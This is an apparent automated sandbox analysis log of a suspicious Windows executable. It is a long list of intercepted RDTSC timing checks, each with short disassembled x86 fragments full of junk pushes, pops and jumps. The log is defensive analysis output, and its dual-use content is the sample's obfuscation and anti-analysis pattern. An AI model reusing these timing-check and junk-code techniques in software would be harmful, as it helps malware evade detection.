Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7E1B88 second address: 7E1C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FED74F3E526h 0x0000000b nop 0x0000000c mov edx, 7765BC42h 0x00000011 push dword ptr [ebp+122D3510h] 0x00000017 or edx, dword ptr [ebp+1251D257h] 0x0000001d call 00007FED74F3E519h 0x00000022 jnl 00007FED74F3E538h 0x00000028 push eax 0x00000029 pushad 0x0000002a jno 00007FED74F3E518h 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007FED74F3E528h 0x0000003e mov eax, dword ptr [eax] 0x00000040 push esi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7E2E01 second address: 7E2E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7E2E0A second address: 7E2E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7E667E second address: 7E6684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90020 second address: 4E90093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED74F3E520h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FED74F3E51Bh 0x0000000f add cx, 563Eh 0x00000014 jmp 00007FED74F3E529h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007FED74F3E521h 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FED74F3E51Eh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED74F3E51Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90093 second address: 4E90099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90099 second address: 4E9009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E9009F second address: 4E900D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FED7550886Dh 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70E00 second address: 4E70E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70E06 second address: 4E70E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70E0A second address: 4E70E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70E0E second address: 4E70E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70E1D second address: 4E70E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70E21 second address: 4E70E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC010A second address: 4EC011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC011C second address: 4EC0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC0120 second address: 4EC014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FED74F3E529h 0x00000011 pop ecx 0x00000012 mov dx, 63B4h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC014B second address: 4EC0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC0151 second address: 4EC0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC0155 second address: 4EC0159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC0159 second address: 4EC016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC016A second address: 4EC0170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC0170 second address: 4EC0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC0175 second address: 4EC018C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov al, bl 0x0000000c mov ax, CE7Bh 0x00000010 popad 0x00000011 pop ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC018C second address: 4EC0190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC0190 second address: 4EC01AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FED75508872h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E500B6 second address: 4E500BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E500BA second address: 4E500D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E500D2 second address: 4E5010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A954h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FED74F3E521h 0x00000016 adc ah, FFFFFFC6h 0x00000019 jmp 00007FED74F3E521h 0x0000001e popfd 0x0000001f mov dl, ch 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E5010C second address: 4E50126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 7460D15Fh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50126 second address: 4E5016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007FED74F3E527h 0x0000000c or esi, 6F45CB5Eh 0x00000012 jmp 00007FED74F3E529h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E5016F second address: 4E50173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50173 second address: 4E50186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50186 second address: 4E5018C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E5018C second address: 4E50190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E50190 second address: 4E501BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FED75508875h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70C2A second address: 4E70C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E51Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FED74F3E51Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70C5F second address: 4E70C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70C65 second address: 4E70C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70C69 second address: 4E70C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E706D4 second address: 4E706F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E706F1 second address: 4E70727 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED7550886Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ch, dl 0x00000013 movzx eax, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov si, CE6Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70727 second address: 4E7072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E7072C second address: 4E70793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED7550886Fh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FED75508879h 0x0000000f or esi, 511A4726h 0x00000015 jmp 00007FED75508871h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 jmp 00007FED7550886Eh 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FED7550886Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70793 second address: 4E70799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E705E9 second address: 4E7068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov eax, 79897433h 0x00000011 jmp 00007FED75508878h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FED7550886Bh 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FED75508874h 0x00000025 adc ecx, 5B464698h 0x0000002b jmp 00007FED7550886Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FED75508878h 0x00000037 xor ax, F0F8h 0x0000003c jmp 00007FED7550886Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 pushad 0x00000046 jmp 00007FED75508874h 0x0000004b push eax 0x0000004c push edx 0x0000004d mov ah, 0Dh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70356 second address: 4E70373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70373 second address: 4E70385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70385 second address: 4E70389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70389 second address: 4E7038F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E7038F second address: 4E703A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, AAh 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov eax, 4591B2A1h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E703A5 second address: 4E7041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508876h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FED75508870h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edi, ax 0x0000001d pushfd 0x0000001e jmp 00007FED75508876h 0x00000023 or ecx, 3168E228h 0x00000029 jmp 00007FED7550886Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E801A0 second address: 4E801FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E51Bh 0x00000009 and ch, 0000006Eh 0x0000000c jmp 00007FED74F3E529h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FED74F3E520h 0x00000018 jmp 00007FED74F3E525h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E801FD second address: 4E80201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E80201 second address: 4E80207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E80207 second address: 4E80268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1CC7h 0x00000007 push esi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f jmp 00007FED75508874h 0x00000014 pushfd 0x00000015 jmp 00007FED75508872h 0x0000001a sbb ecx, 0192BFD8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FED75508875h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC000E second address: 4EC004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FED74F3E522h 0x00000012 add cx, 2E68h 0x00000017 jmp 00007FED74F3E51Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov esi, 3988B82Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC004A second address: 4EC00BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FED75508872h 0x0000000f sbb si, 2BF8h 0x00000014 jmp 00007FED7550886Bh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ax, 1D4Bh 0x00000022 mov edx, esi 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FED7550886Fh 0x0000002f xor eax, 4D5E2C6Eh 0x00000035 jmp 00007FED75508879h 0x0000003a popfd 0x0000003b movzx esi, di 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC00BF second address: 4EC00DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E529h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EC00DC second address: 4EC00E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E9040F second address: 4E9043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, DD5Fh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E9043F second address: 4E90444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90444 second address: 4E904A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 call 00007FED74F3E522h 0x00000015 pushfd 0x00000016 jmp 00007FED74F3E522h 0x0000001b or al, 00000028h 0x0000001e jmp 00007FED74F3E51Bh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 popad 0x00000026 and dword ptr [eax], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FED74F3E522h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70532 second address: 4E70538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E70538 second address: 4E7053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E7053C second address: 4E705AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FED7550886Fh 0x00000013 add eax, 61456E6Eh 0x00000019 jmp 00007FED75508879h 0x0000001e popfd 0x0000001f mov bl, al 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007FED75508873h 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FED75508875h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E705AF second address: 4E705B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E705B5 second address: 4E705B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E80EB1 second address: 4E80EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E80EC9 second address: 4E80F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FED75508876h 0x00000011 push eax 0x00000012 jmp 00007FED7550886Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FED75508876h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FED7550886Dh 0x00000027 mov ch, 8Eh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E901E6 second address: 4E901EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E901EA second address: 4E90207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90207 second address: 4E90272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E527h 0x00000009 adc cx, CB6Eh 0x0000000e jmp 00007FED74F3E529h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov edi, esi 0x0000001d jmp 00007FED74F3E526h 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FED74F3E51Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90272 second address: 4E90277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90277 second address: 4E90289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 2392h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90289 second address: 4E9028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E9028D second address: 4E90293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4E90293 second address: 4E90299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 4EB06DA second address: 4EB06DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
